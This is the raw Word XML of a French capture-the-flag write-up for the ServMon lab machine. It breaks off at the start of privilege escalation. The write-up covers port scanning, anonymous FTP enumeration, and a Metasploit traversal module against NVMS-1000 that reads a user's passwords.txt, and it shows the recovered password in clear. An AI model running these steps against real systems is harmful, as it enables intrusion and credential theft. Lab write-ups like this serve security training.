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96337" w14:textId="7C13CD92" w:rsidR="00E211E5" w:rsidRDefault="004469AB" w:rsidP="004469AB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="1EC25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85pt;height:242.3pt">
            <v:imagedata r:id="rId6" o:title="info"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824C364" w14:textId="33EE1786" w:rsidR="008E13B6" w:rsidRPr="0010751B" w:rsidRDefault="008E13B6" w:rsidP="0010751B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010751B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11E63F" w14:textId="77777777" w:rsidR="00762B6D" w:rsidRDefault="00762B6D"/>
    <w:p w14:paraId="500934FD" w14:textId="3100F709" w:rsidR="008E13B6" w:rsidRDefault="003608AC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ServMon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est un Windows dont l’adresse IP est </w:t>
      </w:r>
      <w:r w:rsidR="00E11D3E">
        <w:t>10.10.10.184.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AFBBDD" w14:textId="66FDD6E4" w:rsidR="00E11D3E" w:rsidRDefault="00E11D3E">
      <w:r>
        <w:t>Compétences mises en œuvre :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA8F800" w14:textId="357433D0" w:rsidR="00E11D3E" w:rsidRDefault="00E11D3E" w:rsidP="00617AF5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63F9C24A" w14:textId="6149C389" w:rsidR="00CE7D95" w:rsidRDefault="006333E7" w:rsidP="00E11D3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vérification FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF46B1" w14:textId="51B2E09D" w:rsidR="006333E7" w:rsidRDefault="00617AF5" w:rsidP="00E11D3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identification d’un service web vulnérable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FB855" w14:textId="7FD4D526" w:rsidR="00617AF5" w:rsidRDefault="00617AF5" w:rsidP="00E11D3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recherche </w:t>
      </w:r>
      <w:r w:rsidR="005A7E52">
        <w:t xml:space="preserve">et exploitation </w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00B71C2C">
        <w:t>e CVE</w:t>
      </w:r>
      <w:r w:rsidR="00D358C2">
        <w:t xml:space="preserve"> (LFI)</w:t>
      </w:r>
      <w:r w:rsidR="005A7E52">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2302157B" w14:textId="24E6C88A" w:rsidR="001569EA" w:rsidRDefault="00C0325B" w:rsidP="00E11D3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CVE d’élévation de privilège sous Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157E3604" w14:textId="7C4D993B" w:rsidR="00CC71ED" w:rsidRDefault="008E0A52" w:rsidP="00E11D3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Redirection de port (port </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forwarding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D515A2">
        <w:t xml:space="preserve"> sous SSH</w:t>
      </w:r>
      <w:r>
        <w:t>) sous Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571D8FC9" w14:textId="3202D56E" w:rsidR="00CB68A9" w:rsidRDefault="00CB68A9" w:rsidP="00E11D3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Transfert de fichier d</w:t>
      </w:r>
      <w:r w:rsidR="00FD775A">
        <w:t xml:space="preserve">e la machine attaquante à la victime avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FD775A">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00046CBF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBC750" w14:textId="77777777" w:rsidR="00630447" w:rsidRDefault="006304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7EAD497" w14:textId="4E04090B" w:rsidR="008E13B6" w:rsidRPr="0010751B" w:rsidRDefault="008E13B6" w:rsidP="0010751B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010751B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enumération initiale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D88462E" w14:textId="03E2D3E2" w:rsidR="008E13B6" w:rsidRDefault="00533C4C">
      <w:r>
        <w:t xml:space="preserve">Nous commençons comme toujours par l’énumération des ports et services de la machine avec </w:t>
      </w:r>
      <w:r w:rsidRPr="00046CBF">
        <w:rPr>
          <w:b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33C4C" w14:paraId="1BB5F4EE" w14:textId="77777777" w:rsidTr="00046CBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="642933D2" w14:textId="50751674" w:rsidR="00533C4C" w:rsidRDefault="00533C4C">
            <w:r>
              <w:t>$ nmap</w:t>
            </w:r>
            <w:r w:rsidR="00882955">
              <w:t xml:space="preserve"> -T4 -A 10.10.10.184</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FE72B8B" w14:textId="2C9F2084" w:rsidR="00533C4C" w:rsidRDefault="00533C4C"/>
    <w:p w14:paraId="6FAF4443" w14:textId="5E61A0BC" w:rsidR="00600CFA" w:rsidRDefault="00046CBF" w:rsidP="00046CBF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="43C57DEA">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:453.3pt;height:326.8pt">
            <v:imagedata r:id="rId7" o:title="nmap"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E67CC94" w14:textId="10C92649" w:rsidR="00600CFA" w:rsidRDefault="00600CFA">
      <w:r>
        <w:t>Plusieurs ports ouverts,</w:t>
      </w:r>
      <w:r w:rsidR="008F3341">
        <w:t xml:space="preserve"> nous allons commencer par énumérer les fichiers/dossiers accessible sur le </w:t>
      </w:r>
      <w:r w:rsidR="008F3341" w:rsidRPr="00227395">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidR="008F3341">
        <w:t xml:space="preserve"> puis </w:t>
      </w:r>
      <w:r w:rsidR="005151D9">
        <w:t>nous passerons à l’énumération des sites web.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3403A9" w14:paraId="4FEF2989" w14:textId="77777777" w:rsidTr="00227395">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="7045BCB7" w14:textId="1C576A75" w:rsidR="003403A9" w:rsidRDefault="003403A9">
            <w:r>
              <w:t>$ ftp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B2E7EFB" w14:textId="36DA861E" w:rsidR="00344C61" w:rsidRDefault="00344C61">
            <w:r>
              <w:t xml:space="preserve">ftp &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>anonymous</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="611BF3F4" w14:textId="77777777" w:rsidR="00344C61" w:rsidRDefault="00344C61">
            <w:r>
              <w:t>ftp &gt; passive</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BFFAAB4" w14:textId="77777777" w:rsidR="00344C61" w:rsidRDefault="00344C61">
            <w:r>
              <w:t xml:space="preserve">ftp &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6702DD7F" w14:textId="77777777" w:rsidR="00344C61" w:rsidRDefault="00344C61">
            <w:r>
              <w:t xml:space="preserve">ftp &gt; cd </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Users</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5AD0EF05" w14:textId="77777777" w:rsidR="00344C61" w:rsidRDefault="00344C61">
            <w:r>
              <w:t xml:space="preserve">ftp &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Nadine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EC90F15" w14:textId="77777777" w:rsidR="00344C61" w:rsidRDefault="00344C61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ftp &gt;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"</w:t>
            </w:r>
            <w:r>
              <w:t>Nadine\\Confidential.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6934741D" w14:textId="77777777" w:rsidR="00344C61" w:rsidRDefault="00344C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ftp &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Nathan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A1E1A98" w14:textId="5C2423FC" w:rsidR="00344C61" w:rsidRDefault="00344C61">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">ftp &gt; </w:t>
            </w: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"Nathan\\Notes to do.txt"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FCE6A5B" w14:textId="4F3823B9" w:rsidR="003403A9" w:rsidRDefault="003403A9"/>
    <w:p w14:paraId="37BF53A3" w14:textId="66364CA8" w:rsidR="003403A9" w:rsidRDefault="00227395" w:rsidP="00227395">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4C27BF0C">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:435.15pt;height:409.45pt">
            <v:imagedata r:id="rId8" o:title="ftp"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E6D2C" w14:textId="082E9AFF" w:rsidR="00AD2A5A" w:rsidRDefault="00AD2A5A">
      <w:r>
        <w:t>Les ressources obtenus lors de l’énumération ftp nous permet d</w:t>
      </w:r>
      <w:r w:rsidR="00227395">
        <w:t xml:space="preserve">e savoir qu’un fichier </w:t>
      </w:r>
      <w:r w:rsidR="00227395" w:rsidRPr="00E40B0E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>passwords.txt</w:t>
      </w:r>
      <w:r w:rsidR="00227395">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00556C6D">
        <w:t xml:space="preserve">est </w:t>
      </w:r>
      <w:r w:rsidR="00227395">
        <w:t>présent</w:t>
      </w:r>
      <w:r w:rsidR="00556C6D">
        <w:t xml:space="preserve"> sur le bureau de l’utilisateur </w:t>
      </w:r>
      <w:r w:rsidR="00556C6D" w:rsidRPr="00227395">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nathan</w:t>
      </w:r>
      <w:r w:rsidR="00556C6D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0062C4AA" w14:textId="5864F81A" w:rsidR="00D97E8F" w:rsidRDefault="008A7300">
      <w:r>
        <w:t>Passons m</w:t>
      </w:r>
      <w:r w:rsidR="00D97E8F">
        <w:t xml:space="preserve">aintenant les serveurs web, étant donné qu’il y en a deux, </w:t>
      </w:r>
      <w:r w:rsidR="00D01E8A">
        <w:t>nous allons nous attarder sur le</w:t>
      </w:r>
      <w:r w:rsidR="00F45276">
        <w:t xml:space="preserve"> normal (</w:t>
      </w:r>
      <w:r w:rsidR="00F45276" w:rsidRPr="00E40B0E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>port 80</w:t>
      </w:r>
      <w:r w:rsidR="00D01E8A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00491C1E">
        <w:t xml:space="preserve"> avec une énumération de dossier/fichier avec </w:t>
      </w:r>
      <w:r w:rsidR="00491C1E" w:rsidRPr="00E40B0E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dirsearch</w:t>
      </w:r>
      <w:r w:rsidR="00491C1E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491C1E" w14:paraId="056B5BBE" w14:textId="77777777" w:rsidTr="00E40B0E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="37B066FA" w14:textId="5627E84B" w:rsidR="00491C1E" w:rsidRDefault="00491C1E">
            <w:r>
              <w:t>$ dirsearch</w:t>
            </w:r>
            <w:r w:rsidR="008A6B77">
              <w:t xml:space="preserve"> –w wordlist.txt –e </w:t>
            </w:r>
            <w:r w:rsidR="008A6B77">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008A6B77">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="008A6B77">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>,txt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="008A6B77">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>" –f –x 403 –t 80 –u http://10.10.10.184</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="771AC7C6" w14:textId="052B64A4" w:rsidR="00491C1E" w:rsidRDefault="00491C1E"/>
    <w:p w14:paraId="6CC09761" w14:textId="45FDA023" w:rsidR="00377577" w:rsidRDefault="00C95DE6" w:rsidP="00C95DE6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="2DF535DC">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:212.85pt;height:492.1pt">
            <v:imagedata r:id="rId9" o:title="dirsearch"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CB3A44" w14:textId="6C29E64D" w:rsidR="00377577" w:rsidRDefault="00377577">
      <w:r>
        <w:t>En attendant</w:t>
      </w:r>
      <w:r w:rsidR="00FC5A0A">
        <w:t xml:space="preserve"> la fin </w:t>
      </w:r>
      <w:r w:rsidR="00C95DE6">
        <w:t>d’énumération</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, nous allons </w:t>
      </w:r>
      <w:r w:rsidR="00895BC7">
        <w:t xml:space="preserve">effectuer un rapide tour sur l’interface web, nous pouvons voir que la technologie utilisée est : </w:t>
      </w:r>
      <w:r w:rsidR="00D5628D" w:rsidRPr="00C95DE6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NVMS-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D5628D" w:rsidRPr="00C95DE6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidR="00D5628D">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D5628D">
        <w:t xml:space="preserve"> Nous allons donc rechercher une CVE ou un exploit concernant </w:t>
      </w:r>
      <w:r w:rsidR="00D5628D" w:rsidRPr="00C95DE6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NVMS</w:t>
      </w:r>
      <w:r w:rsidR="00D5628D">
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r w:rsidR="00D5628D" w:rsidRPr="00C95DE6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:r w:rsidR="00D5628D">
        <w:t xml:space="preserve"> et google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D5628D" w14:paraId="1A4FC1C3" w14:textId="77777777" w:rsidTr="00C95DE6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="44AF7607" w14:textId="1E74FF14" w:rsidR="00D5628D" w:rsidRDefault="00D5628D">
            <w:r>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidR="00C95DE6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>searchsploit NVMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EA1DC63" w14:textId="1FDE75F2" w:rsidR="00D5628D" w:rsidRDefault="00D5628D"/>
    <w:p w14:paraId="345F7EAF" w14:textId="42F8999A" w:rsidR="00013D60" w:rsidRDefault="00C95DE6" w:rsidP="00C95DE6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="347E219B">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:453.3pt;height:46.95pt">
            <v:imagedata r:id="rId10" o:title="searchsploit"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5A29F" w14:textId="77777777" w:rsidR="004149C6" w:rsidRDefault="00414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480D99" w14:textId="033B9451" w:rsidR="008E13B6" w:rsidRPr="0010751B" w:rsidRDefault="008E13B6" w:rsidP="0010751B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010751B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Obtenir un accès utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33037CFC" w14:textId="6A7EC4BB" w:rsidR="008E13B6" w:rsidRDefault="00F47424">
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r w:rsidR="00367F13">
        <w:t>deuxième</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit est testé et approuvé via </w:t>
      </w:r>
      <w:r w:rsidRPr="003609CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, grâce à lui, nous pouvons aller consulter le fichier sur le bureau de </w:t>
      </w:r>
      <w:r w:rsidRPr="003609CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nathan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pour avoir des mots de passes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F47424" w14:paraId="7598EFDA" w14:textId="77777777" w:rsidTr="003609CF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="6EF106B4" w14:textId="4EFD6BFA" w:rsidR="00F47424" w:rsidRDefault="00F239ED">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3D3854FF" w14:textId="77777777" w:rsidR="00F239ED" w:rsidRDefault="00F239ED">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Msf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &gt; use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auxiliary</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/scanner/http/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tvt_nvms_traversal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1BAAF861" w14:textId="77777777" w:rsidR="00F239ED" w:rsidRDefault="00F239ED">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Msf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &gt;  set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rhosts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 10.10.10.184</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6264C599" w14:textId="77777777" w:rsidR="00F239ED" w:rsidRDefault="00F239ED">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Msf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &gt; set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>filepath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 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nathan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/desktop/passwords.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2740A223" w14:textId="313E45EC" w:rsidR="00F239ED" w:rsidRDefault="00F239ED">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Msf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>run</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4919C217" w14:textId="77777777" w:rsidR="00F47424" w:rsidRDefault="00F47424"/>
    <w:p w14:paraId="43D8D25D" w14:textId="1A71C4DD" w:rsidR="00367F13" w:rsidRDefault="003609CF" w:rsidP="003609CF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="5466D18C">
          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:449.55pt;height:109.55pt">
            <v:imagedata r:id="rId11" o:title="exploit"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50679B" w14:textId="38046E71" w:rsidR="00367F13" w:rsidRDefault="00367F13">
      <w:r>
        <w:t xml:space="preserve">Maintenant que nous avons une liste de mot de passe, nous pouvons les tester un par un avec les identifiants </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003609CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nathan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003609CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nadine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Le mot de passe </w:t>
      </w:r>
      <w:r w:rsidRPr="003609CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>L1k3B1gBu</w:t>
      </w:r>
      <w:r w:rsidR="005C5E21" w:rsidRPr="003609CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>t7s@W0rk</w:t>
      </w:r>
      <w:r w:rsidR="005C5E21">
        <w:t xml:space="preserve"> fonctionne avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C5E21" w:rsidRPr="003609CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nadine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C5E21">
        <w:t xml:space="preserve">, nous pouvons aller </w:t>
      </w:r>
      <w:r w:rsidR="00D06377">
        <w:t>récupérer</w:t>
      </w:r>
      <w:r w:rsidR="005C5E21">
        <w:t xml:space="preserve"> le flag </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005C5E21">
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005C5E21">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674AE2A" w14:textId="7E7B0613" w:rsidR="005C5E21" w:rsidRDefault="003609CF" w:rsidP="003609CF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="50A4FC50">
          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:356.25pt;height:30.7pt">
            <v:imagedata r:id="rId12" o:title="ssh"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDED707" w14:textId="77777777" w:rsidR="00F92FE6" w:rsidRDefault="00F92F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E7CA43" w14:textId="4450DA98" w:rsidR="008E13B6" w:rsidRPr="0010751B" w:rsidRDefault="008E13B6" w:rsidP="0010751B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010751B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Obtenir un accès root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46BB5D" w14:textId="38E0D0FF" w:rsidR="008E13B6" w:rsidRDefault="00E9187C">
      <w:r>
        <w:t>L’accès root est plutôt complexe, il faut commencer avec de l’énumération des programmes installés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E9187C" w14:paraId="42CF691A" w14:textId="77777777" w:rsidTr="00F92FE6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="4E9EF2A4" w14:textId="5BB7DE85" w:rsidR="00E9187C" w:rsidRDefault="00E9187C">
            <w:r>
              <w:t xml:space="preserve">C:\&gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dir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"Program Files</w:t>
